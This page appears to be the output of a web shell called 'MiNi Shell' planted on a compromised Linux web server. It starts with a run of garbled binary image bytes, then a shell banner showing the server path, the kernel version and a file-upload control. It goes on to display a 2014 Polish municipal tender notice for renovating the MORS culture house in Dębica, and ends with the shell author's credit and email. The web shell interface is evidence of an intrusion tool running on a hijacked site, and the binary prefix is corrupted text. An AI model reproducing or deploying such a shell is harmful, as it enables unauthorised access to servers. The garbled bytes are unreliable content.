JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140424/89259-N-2014.html

<p class="kh_header"><b>Dębica: Przebudowa i modernizacja Domu Kultury MORS w Dębicy dla potrzeb programu Europa Miast, rozwoju kultury i promocji przedsiębiorczości - etap I</b><br>
<b>Numer ogłoszenia: 89259 - 2014; data zamieszczenia: 24.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Dębicy , ul. Ratuszowa 2, 39-200 Dębica, woj. podkarpackie, tel. 014 6838100, faks 014 6838161.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.debica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i modernizacja Domu Kultury MORS w Dębicy dla potrzeb programu Europa Miast, rozwoju kultury i promocji przedsiębiorczości - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie i oddanie przedmiotu zamówienia zrealizowanego zgodnie z dokumentacją techniczną, warunkami technicznymi i obowiązującymi przepisami. Przebudowa i modernizacja DK MORS - obiekt o powierzchni 4 098,49m2 i kubaturze 25 113,16 m3. 
Zakres:
1. Termomodernizacja.
2. Roboty budowlane wewnętrzne.
3. Orkiestrion.
4. Fotele stałe i mobilne.
5. Instalacja wod - Kan.
6. Instalacja c.o.
7. Wentylacja Sali widowiskowej i sceny oraz instalacja grzewcza i chłodnicza dla wentylacji.
8. Wentylacja sal baletowych.
9. Instalacje elektryczne, SAP, teletechniczna.
10. Mechanika sceny.
11. Oświetlenie sceny i Sali widowiskowej.
12. Nagłośnienie.
13. Wyposażenie multimedialne.
14. Winda osobowa.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust.1 pkt 6 UPzp, stanowiących nie więcej niż  30% wartości zamówienia podstawowego polegających na powtórzeniu tego samego rodzaju robót tj.: termomodernizacja, roboty budowlane, zewnętrzne,  wewnętrzne, instalacyjne - określone   w dokumentacji jako etap II</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.21.23.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 300 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego opisu spełniania tego warunku. Ocena spełniania niniejszego warunku zostanie dokonana w oparciu o dostarczone oświadczenie o spełnianiu warunków udziału w  postępowaniu, wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert:
a) 1 roboty  budowlanej,  której  przedmiotem  jest  budowa,  przebudowa  lub  remont  obiektu budowlanego   z   salą  nie  mniejszą  niż  300  miejsc,   z  wentylacją  o  wydajności   minimum 25 tys. m3-h o wartości nie mniejszej  niż  9 000 000,00 zł  brutto,   posiadającej   powierzchnię  użytkową nie mniejszą niż 3 000m2.
b) 1 dostawy, której przedmiotem jest scena  z  kurtyną  rozsuwaną  elektryczną  i  oświetleniem, o wartości nie mniejszej niż 500 000,00 zł brutto.
Jednocześnie Zamawiający dopuszcza przedstawienie zestawu obiekt + dostawa jako jednej roboty budowlanej z dostawą pod warunkiem, że wartość będzie wynosić nie mniej niż 9 500 000,00 zł brutto  i spełniać będzie wymagania określone w p-pkt. a) i b).
Ocena spełniania warunku zostanie dokonana w oparciu o dostarczone dokumenty, wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego opisu spełniania tego warunku. Ocena spełniania niniejszego warunku zostanie dokonana w oparciu o dostarczone oświadczenie o spełnianiu warunków udziału w  postępowaniu, wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże osoby zdolne do wykonania zamówienia:
a) Kierownika budowy w specjalności konstrukcji budowlanych,
b) Kierownika robót w specjalności instalacji elektrycznych,
c) Kierownika robót w specjalności instalacji teletechnicznych,
d) Kierownika robót w specjalności instalacji sanitarnych,
e) Kierownika robót w specjalności instalacji gazowej.
Zamawiający dopuszcza łączenie uprawnień przez wskazane w ofercie osoby.
Ocena spełniania warunku zostanie dokonana w oparciu o dostarczone dokumenty, wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie  spełniony jeżeli Wykonawca wykaże się:
a) posiadaniem  środków  finansowych  lub zdolności  kredytowej w   wysokości co   najmniej  4 000 000,00 zł,
b) posiadaniem ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości co najmniej 2 000 000,00 zł.
Ocena spełniania niniejszego warunku zostanie dokonana w oparciu o dostarczone oświadczenie  o spełnianiu warunków udziału w postępowaniu, wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w sprawie zamówienia publicznego polegające na:
1. Zmiana wynagrodzenia brutto Wykonawcy, a dotycząca robót jeszcze niewykonanych, względem których Wykonawca nie pozostaje w zwłoce o wysokość zmienionej stawki podatku VAT - W przypadku zmiany ustawowej wysokości podatku od towarów i usług VAT. 
2. Zmiana przedmiotu umowy, zmiana terminu wykonania umowy - W przypadku konieczności aktualizacji rozwiązań mających zastosowanie w realizacji niniejszej umowy ze względu, na postęp technologiczny, brak dostępności na rynku materiałów, maszyn, urządzeń  jeżeli zmiana taka powoduje:
a) obniżenie kosztów eksploatacji lub konserwacji budynku lub urządzenia, - poprawę parametrów technicznych,
b) jest korzystna z uwagi na postęp technologiczny.
3. Zmiana przedmiotu umowy, zmiana terminu wykonania umowy, zmiana wynagrodzenia   Wykonawcy, z zastrzeżeniem, że wynagrodzenie zostanie ustalone na zasadzie różnicowej względem robót pierwotnych i zamiennych - W przypadku konieczności wprowadzenia robót zamiennych, których konieczność zastosowania ujawniła się w trakcie realizacji robót, a zmiana:
a) jest korzystna dla Zamawiającego,
b) nie wpłynie na zwiększenie wartości wynagrodzenia umownego,
c) usprawni proces realizacji,
d) zapobiegnie powstaniu dużych i nieodwracalnych  w skutkach strat dla Zamawiającego.
4. Zmiana przedmiotu umowy, zmiana terminu wykonania umowy, zmiana wynagrodzenia Wykonawcy,  o którym mowa w § 10 ust. 1) umowy z zastrzeżeniem, że wartość robót, które nie będą wykonywane ustalona będzie wg. Kosztorysu ofertowego - W przypadku braku uzasadnienia dla wykonania robót objętych SIWZ, która to okoliczność ujawniła się w trakcie realizacji robót, a zmiana jest korzystna dla Zamawiającego.
5. Zmiana    przedmiotu    umowy,    zmiana    terminu    wykonania umowy,   zmiana  wynagrodzenia Wykonawcy, z zastrzeżeniem, że wynagrodzenie zostanie ustalone na podstawie cen jednostkowych kosztorysu ofertowego będącego załącznikiem do umowy - W przypadku Modyfikacja Dokumentacji 
projektowej, która to konieczność modyfikacji ujawniła się w trakcie realizacji robót, i
a) nie była zawiniona przez Zamawiającego, a wymagają tego względy  techniczne  i  technologiczne stwierdzone   w   czasie   realizacji   umowy  np.  po    odkryciu    podczas    rozbiórki    elementów niezinwentaryzowanych  lub o innych parametrach technicznych niż przyjęte w dokumentacji lub
b) wynikła  z   propozycji   Wykonawcy   co   do   innego   sposobu   wykonania   danego   elementu, pod warunkiem wyrażenia zgody zamawiającego, nie wykroczy poza określony zakres zamówienia, 
nie wpłynie na zwiększenie wynagrodzenia umownego.
6. Zmiana terminu wykonania umowy:
a) w przypadku wystąpienia zdarzeń siły wyższej rozumianej jako zdarzenie zewnętrzne, niemożliwe do przewidzenia i niemożliwe do zapobieżenia, uniemożliwiające realizację umowy  na  zasadach w niej określonych,      
b)  w przypadku konieczności zmian terminu wykonania umowy z przyczyn zależnych od  Zamawiającego,
c) wystąpienie trudnych warunków atmosferycznych potwierdzonych przez IMiGW uniemożliwiających dochowanie wymogów technicznych lub technologicznych tj.: ciągłych  opadów  atmosferycznych utrzymujących się przez 4 kolejne dni przekraczających stan średnich opadów  na  danym  terenie 
lub wystąpienie gwałtownych zjawisk: powodzi, pożaru, trąby powietrznej itp.,
d) wstrzymanie robót przez właściwy organ z przyczyn niezawinionych przez Wykonawcę  oraz  inne przeszkody lub utrudnienia w wykonywaniu przedmiotu umowy spowodowane przez osoby trzecie - nie dłużej jednak niż o czas wstrzymania robót,
e) konieczności wykonania robót dodatkowych, które warunkują termin wykonania zamówienia.
7. Zmiana osób, o których mowa w § 6 ust. 1 umowy, z  zastrzeżeniem  konieczności  spełnienia  przez ww. osobę warunków określonych  w  SIWZ  -  W  przypadku  konieczności  zmiany  osób  o  których mowa   w   § 6 ust. 1   umowy,   a   nie   przewidzianych  przez   Wykonawcę  (np.  śmierć,  choroba, 
rozwiązanie stosunku prawnego  z winy ww. osoby lub przez ww. osobę).   
8.   Zmiana   Podwykonawców   lub   dalszych   Podwykonawców -  W  przypadku  okoliczności  leżących po stronie  Wykonawcy, których Wykonawca  nie  mógł  przewidzieć  w  chwili  zawierania  umowy z Zamawiającym a dotyczące możliwości korzystania z zasobów  Podwykonawców  (np.  odstąpienie od   umowy   Podwykonawców),   Podwykonawców,   Podwykonawców  przypadku  gdy dotyczy to   podwykonawców,  na  którego  zasoby  powoływał  się  Wykonawca   na  zasadach  określonych w art.26 ust.2b ustawy PZP - po wcześniejszym spełnieniu warunków  jak w art. 36b ust.2 ustawy PZP.
9. Zmiana   przedmiotu   umowy,  zmiana  terminu  wykonania  umowy,  zmiana  warunków  płatności - W  przypadku  konieczności  dostosowania  do  wymogów  instytucji  dofinansowującej,  w  wyniku zmiany wymogów sposobu rozliczania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.debica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miejski  w  Dębicy, Biuro Zamówień Publicznych, 39-200 Dębica, ul. Ratuszowa 2, pokój nr 229.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2014 godzina 10:00, miejsce: Urząd Miejski w Dębicy, Sekretariat Zastępców  Burmistrza,  39-200 Dębica,   ul. Ratuszowa 2,  pokój   nr 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego  Województwa Podkarpackiego na lata 2007-2013 i budżetu państwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com